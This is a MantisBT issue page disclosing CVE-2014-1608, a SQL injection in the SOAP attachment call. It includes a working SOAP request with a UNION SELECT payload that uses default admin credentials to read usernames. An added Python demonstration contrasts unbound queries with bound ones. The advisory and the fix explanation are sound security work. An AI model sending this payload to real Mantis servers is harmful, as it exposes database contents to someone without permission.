MantisBT

View Issue Details

ID: 0016879
Project: mantisbt
Category: security
View Status: public
Date Submitted: 2014-01-24 10:26
Last Update: 2014-02-07 18:24
Reporter: dregad
Assigned To: dregad
Priority: immediate
Severity: major
Reproducibility: have not tried
Status: closed
Resolution: fixed
Platform / OS / OS Version: (not set)
Product Version: 1.1.0a4
Target Version: 1.2.16
Fixed in Version: 1.2.16
Summary: 0016879: CVE-2014-1608: soap:Envelope SQL injection attack
Description: The SOAP API can be used for SQL injection attacks.

Pasting relevant extracts of the original e-mail report below

-----------------

The XML sent to the SOAP web service is sometimes validated, sometimes not. This
is independent of the php.ini and seems to depend on the PHP binary.
The php binaries on the different systems (I used the thoughtpolice images)
differ in the libxml2 version. But I am not quite sure this is the reason.

It is definitely still an issue, but it is not 100% certain whether the
responsibility lies 100% with mantisbt.org.

The XML request cannot be issued without a user account. The request allows
reading the contents of the entire Mantis database no matter what the user's
access permissions are. Mantis is often used with many projects and has a
fine-grained permission structure.
Steps To Reproduce: If you would like to reproduce the issue, you could issue the following
request to a current Mantis system (1.2.15), maybe on a recent CentOS image
from thoughtpolice (http://sourceforge.net/projects/thoughtpolicevm/). This
example uses the administrator account, because it is enabled by default...

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <mc_issue_attachment_get xmlns="http://futureware.biz/mantisconnect">
      <username>administrator</username>
      <password>root</password>
      <issue_attachment_id>' UNION SELECT 927,3358,1337,313373,1,1,1,1,1,username,23,42 FROM mantis_user_table WHERE mantis_user_table.id=1 ORDER BY bug_id,'true</issue_attachment_id>
    </mc_issue_attachment_get>
  </soap:Body>
</soap:Envelope>

This request selects the username from mantis_user_table with id=1. The
output is base64-encoded.
Additional Information: This issue was initially discovered and reported by e-mail by Andrea Barisani from oCERT, on behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security researcher at n.runs professionals GmbH (https://www.nruns.com), who discovered the issue during an audit at a customer's site on an up-to-date machine with the latest Mantis version (1.2.15).
Tags: No tags attached.
Attached Files: none

- Relationships
related to 0016880 (closed, dregad): CVE-2014-1609: SQL injection vulnerabilities
related to 0016898 (resolved, dregad): Dropping deprecated database API function db_query()

- Notes
Note 0039161
dregad (developer)
2014-01-24 10:28

grangeway quickly identified the root cause and provided a fix for the issue [1]

[1] https://github.com/grangeway/mantisbt/commit/b930f0e44481439ca5bca6b438e55641d139f7e2

- Related Changesets
MantisBT: master-1.2.x 00b4c170
Timestamp: 2014-01-17 16:24:29
Author: Paul Richards
Committer: dregad
Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>

Conflicts:
    api/soap/mc_file_api.php
mod - api/soap/mc_file_api.php

MantisBT: master 3be86ce3
Timestamp: 2014-01-17 16:24:29
Author: Paul Richards
Committer: dregad
Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>
mod - api/soap/mc_file_api.php
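Added example, not code from this page or from MantisBT: a Python/sqlite3 reconstruction of the query pattern the changesets above describe (parameter interpolated into the SQL string and run through an unbound query) next to the bound form the fix switches to, driven by the payload from the Steps To Reproduce. It assumes a constructed 12-column replica of mantis_bug_file_table (the column count matches the 12 values in the reported UNION SELECT; the column names are my assumption about the 1.2.x schema), a minimal constructed mantis_user_table, and the hypothetical function names file_get_vulnerable and file_get_bound standing in for the PHP. The payload's quote-closing tail is adapted for SQLite, as the comment explains; the UNION part is the page's own.

```python
import sqlite3

# Constructed replica (assumption, not from the page) of the two tables the
# reported payload touches. mantis_bug_file_table gets 12 columns because the
# UNION SELECT in the report supplies 12 values; the names are an assumption
# about the MantisBT 1.2.x schema, with "content" as the 10th column.
SCHEMA = """
CREATE TABLE mantis_bug_file_table (
    id INTEGER, bug_id INTEGER, title TEXT, description TEXT, diskfile TEXT,
    filename TEXT, folder TEXT, filesize INTEGER, file_type TEXT, content BLOB,
    date_added INTEGER, user_id INTEGER
);
CREATE TABLE mantis_user_table (id INTEGER, username TEXT, password TEXT);
INSERT INTO mantis_bug_file_table VALUES
    (1, 100, '', '', 'abc', 'notes.txt', '', 5, 'text/plain', X'68656C6C6F', 0, 2);
INSERT INTO mantis_user_table VALUES (1, 'administrator', 'hash');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def file_get_vulnerable(conn, file_id):
    """Pre-fix pattern (hypothetical name): the SOAP parameter is interpolated
    into the SQL text and executed unbound, like db_query() in the PHP."""
    query = "SELECT * FROM mantis_bug_file_table WHERE id='%s'" % file_id
    return conn.execute(query).fetchall()


def file_get_bound(conn, file_id):
    """Fixed pattern (hypothetical name): placeholder plus bound parameter,
    like db_query_bound() in the PHP. The parameter is data, never SQL."""
    query = "SELECT * FROM mantis_bug_file_table WHERE id=?"
    return conn.execute(query, (file_id,)).fetchall()


# The reported payload. One adaptation: the page closes the quote with
# "ORDER BY bug_id,'true", which relies on MySQL accepting a string constant
# as an ORDER BY term; SQLite rejects that in a compound SELECT, so the quote
# is closed with "AND 'x'='x" here instead. The UNION SELECT itself is the
# page's own, with username placed in the 10th (content) column.
PAYLOAD = ("' UNION SELECT 927,3358,1337,313373,1,1,1,1,1,username,23,42 "
           "FROM mantis_user_table WHERE mantis_user_table.id=1 AND 'x'='x")


def content_column(rows):
    """Pick out the content column (index 9), which the SOAP layer would
    return base64-encoded to the caller; this is where the username lands."""
    return [r[9] for r in rows]


def demo():
    """Run both variants against the same payload and return what each leaks."""
    conn = open_db()
    leaked = content_column(file_get_vulnerable(conn, PAYLOAD))
    bound = file_get_bound(conn, PAYLOAD)
    return leaked, bound


if __name__ == "__main__":
    leaked, bound = demo()
    print("unbound query, content column:", leaked)  # ['administrator']
    print("bound query, rows:", bound)                # []
```

The unbound variant returns a row whose content column holds the administrator's username, exactly the data path the reporter describes (the attachment's content field comes back base64-encoded); the bound variant treats the whole string as an id value and returns nothing, while a real id still works. Binding is what the two changesets do; rejecting a non-integer issue_attachment_id before the query would be an extra layer, but is not part of the fix on this page.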

- Issue History
Date Modified Username Field Change
2014-01-24 10:26 dregad New Issue
2014-01-24 10:28 dregad Note Added: 0039161
2014-01-24 10:28 dregad Assigned To => grangeway
2014-01-24 10:28 dregad Status new => confirmed
2014-01-24 10:32 dregad Relationship added related to 0016880
2014-01-24 11:36 dregad Status confirmed => assigned
2014-01-24 11:36 dregad Product Version 1.2.15 => 1.1.0a4
2014-01-24 18:52 dregad Changeset attached => MantisBT master-1.2.x 00b4c170
2014-01-24 18:52 dregad Assigned To grangeway => dregad
2014-01-24 18:52 dregad Status assigned => resolved
2014-01-24 18:52 dregad Resolution open => fixed
2014-01-24 18:52 dregad Fixed in Version => 1.2.16
2014-01-24 18:52 dregad Changeset attached => MantisBT master 3be86ce3
2014-01-28 05:39 dregad Relationship added related to 0016898
2014-02-07 18:21 dregad View Status private => public
2014-02-07 18:24 dregad Status resolved => closed


MantisBT 1.2.17
Copyright © 2000 - 2014 MantisBT Team